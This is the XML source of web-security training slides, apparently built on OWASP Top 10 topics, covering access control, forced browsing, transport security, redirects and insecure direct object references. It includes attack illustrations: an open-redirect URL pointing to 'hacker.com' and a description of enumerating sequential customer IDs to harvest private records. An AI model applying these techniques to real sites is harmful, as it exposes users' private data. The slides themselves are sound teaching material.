              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>o Version control files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• *svn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• *git*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>o Source code files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• *.vb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• *.cs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• *.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• *.pl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="233679">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1440"/>
            </a:pPr>
            <a:r>
              <a:t>• All these should be stored outside the web's root folder </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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0" name="Many sites deny you if you match certain criteria…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="293370" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>Many sites deny you if you match certain criteria</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293370" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>o We should do the opposite:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293370" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>• deny all permissions to sensitive pages and only grant access if certain criteria is met</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293370" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>o Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293370" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>• Don't do this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293370" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>if (Web.Security.Identity.Role == "user")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="880110" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>throw new SecurityException("Denied");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293370" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>• Do this instead:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293370" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>if (Web.Security.Identity.Role != "admin")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="880110" indent="-293370" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2376"/>
            </a:pPr>
            <a:r>
              <a:t>throw new SecurityException("Denied");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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2" name="WordPress allows deleted blog post…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="346709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:t>WordPress allows deleted blog post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:t>WordPress versions 2.8 and below had a problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:t>o Only the owner of a blog should see certain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:t>posts. They remain private until he publishes them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:t>o But if he deleted "all-your-base-belong-to-us"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:t>then anyone could browse to “trash/all-yourbase-belong-to-us" and see that article</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:t>o They just had to know the blog title and the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:t>o A script could detect all deleted posts and show them to anyone </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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4" name="Any sensitive page that is unprotected by authorization methods is vulnerable…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Any sensitive page that is unprotected by authorization methods is vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>use appropriate permissions or ACLs to disallow anonymous reading.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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6" name="forced browsing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>forced browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1817" name="Using this technique, an attacker can bypass website security by accessing files directly instead of following links. This enables the attacker to access data source files directly instead of using the web application."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Using this technique, an attacker can bypass website security by accessing files directly instead of following links. This enables the attacker to access data source files directly instead of using the web application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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9" name="define the list of file types available for remote reading on the server. Many servers allow you to define which file extensions can be served remotely. For example, .log, .dat and database files are not files that all users should have access to - except through secure channels."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>define the list of file types available for remote reading on the server. Many servers allow you to define which file extensions can be served remotely. For example, .log, .dat and database files are not files that all users should have access to - except through secure channels.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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1" name="A9 : Insufficient Transport Layer Protection"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A9 : Insufficient Transport Layer Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182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4" name="SSL versions 1, 2, and 3 should not longer be used.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="324485" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="2628"/>
            </a:pPr>
            <a:r>
              <a:t>SSL versions 1, 2, and 3 should not longer be used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324485" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="2628"/>
            </a:pPr>
            <a:r>
              <a:t>Nearly all modern browsers support at least TLS 1.0 (SSL v3.1 is equivalent to TLS v1.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324485" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="2628"/>
            </a:pPr>
            <a:r>
              <a:t>Rule - Do Not Provide Non-TLS Pages for Secure Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324485" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="2628"/>
            </a:pPr>
            <a:r>
              <a:t>Rule - Do Not Mix TLS and Non-TLS Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324485" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="2628"/>
            </a:pPr>
            <a:r>
              <a:t>Rule - Use "Secure" Cookie Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324485" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="2628"/>
            </a:pPr>
            <a:r>
              <a:t>Rule - Keep Sensitive Data Out of the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324485" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="2628"/>
            </a:pPr>
            <a:r>
              <a:t>Rule - Prevent Caching of Sensitive Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324485" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="2628"/>
            </a:pPr>
            <a:r>
              <a:t>Rule - Use HTTP Strict Transport Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324485" indent="-324485" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr sz="2628"/>
            </a:pPr>
            <a:r>
              <a:t>Rule - Use Public Key Pinning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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6" name="A10 : Unvalidated Redirects and Forwards"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A10 : Unvalidated Redirects and Forwards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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6" name="Verbose Failure Messages"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="6200">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Verbose Failure Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="If an application informs you as to which piece of information was invalid, you can exploit this behavior to considerably diminish the effectiveness of the login mechanism. Then use brute-forcible login attack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="1479712"/>
            <a:ext cx="11099800" cy="6286501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="388620" indent="-388620" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If an application informs you as to which piece of information was invalid, you can exploit this behavior to considerably diminish the effectiveness of the login mechanism. Then use brute-forcible login attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="698" name="image7.png" descr="image7.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059093" y="5852159"/>
            <a:ext cx="9256890" cy="2777068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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9" name="Examples"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1832" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="1660815"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="1660814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1830" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="1660815"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 117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831" name="http://www.mywebapp.com/redirect.jsp?redirectrul=hacker.com"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="11330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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>http://www.mywebapp.com/redirect.jsp?redirectrul=hacker.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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6" name="A4 : insecure direct object reference"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A4 : insecure direct object reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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40" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="903110" y="2041031"/>
            <a:ext cx="11198579" cy="5671538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1841" name="page is indeed making a post request to an HTTP address ending in CustomerService.svc/GetCustomer."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1498204" y="8556869"/>
            <a:ext cx="12361092" cy="84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page is indeed making a post request to an HTTP address ending in CustomerService.svc/GetCustomer. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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43" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="903110" y="397368"/>
            <a:ext cx="9136077" cy="7308862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1844" name="Because the customer ID is sequential, I could easily script the request and enumerate through n records retrieving the private data of every customer in the system."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51119" y="8185477"/>
            <a:ext cx="12100047" cy="84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Because the customer ID is sequential, I could easily script the request and enumerate through n records retrieving the private data of every customer in the system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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47" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="903110" y="1456108"/>
            <a:ext cx="11198579" cy="5707663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1848" name="An indirect reference map is simply a substitution of the internal reference with an alternate ID which can be safely exposed externally."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191295" y="7691718"/>
            <a:ext cx="13042575" cy="84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An indirect reference map is simply a substitution of the internal reference with an alternate ID which can be safely exposed externally. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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0" name="Examples"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1853" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="1660815"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="1660814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1851" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="1660815"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 117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852" name="http://misc-security.com/file.jsp?file=report.txt"/>
